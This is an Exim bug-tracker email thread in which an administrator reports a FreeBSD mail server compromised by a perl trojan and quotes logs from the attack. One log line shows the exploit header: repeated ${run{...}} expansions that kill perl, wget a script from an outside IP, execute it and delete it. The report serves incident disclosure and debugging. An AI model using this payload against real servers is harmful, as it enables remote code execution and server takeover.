------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugs.exim.org/show_bug.cgi?id=1135 --- Comment #8 from Adrian P <[email protected]> 2011-08-12 19:38:42 --- this was / is the default config which is a modified copy of configure.default coming with exim exim installed from ports # $FreeBSD: ports/mail/exim/Makefile,v 1.259 2011/05/11 11:30:17 rea Exp $ the machine was just cleaned up after ( as in kill all the exim and perl processes , the trojan was a perl payload ( my @fakeps = ("/usr/sbin/exim4 -bd -q1h"); ) exim was rebuild using the latest version from freebsd ports because the system wasn't reinstalled after i can't be 100% sure it was clean but the 2nd time is was the same modus operandi : perl script running as mailnull with fake ps and basically this payload ( this was used on 4.69 and was logged by exim) Header0054: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV Header0055: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV HeaderX: ${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130 .19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${ run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh - c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;r tmp/g.x*'}}${run{ *** truncated *** 2011-07-21 06:14:54 SMTP protocol synchronization error (next input sent too soon: pipelining was advertised): rejected "Header0000: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV" H=42.d.5446.static.theplanet.com (yougotpwned.com) [70.84.13.66] next input="Header0001: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\nHeader000" 2011-07-21 06:46:26 SMTP protocol synchronization error (input sent without waiting for greeting): rejected connection from H=[208.57.239.52] input="GET / HTTP/1.1\ r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac " -- // looks like msf running on iphone just in case i will leave that machine acting as a honey pot ( the OS was rebuild yesterday) but with the same version of exim and config On 11-08-12 11:28 AM, Graeme Fowler wrote: > ------- You are receiving this mail because: ------- > You reported the bug. > > http://bugs.exim.org/show_bug.cgi?id=1135 > > > > > --- Comment #7 from Graeme Fowler <[email protected]> 2011-08-12 16:28:00 > --- > (In reply to comment #6) >> that was the config at the time > What was, the default config? > > If so - was that the stock default config from the distribution, a default > config supplied by the FreeBSD ports collection, a packaged default config > from > somewhere else? > > Please add it as an attachment to this bug. If it's irrelevant, at least we'll > have proved that it is but until then it may have some relevance. > > I might also add - did you rebuild the machine in the first place after it got > hacked, or do some sort of "clearup" operation? Are you absolutely sure that > it > got completely secured? > > -- Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email -- ## List details at https://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##
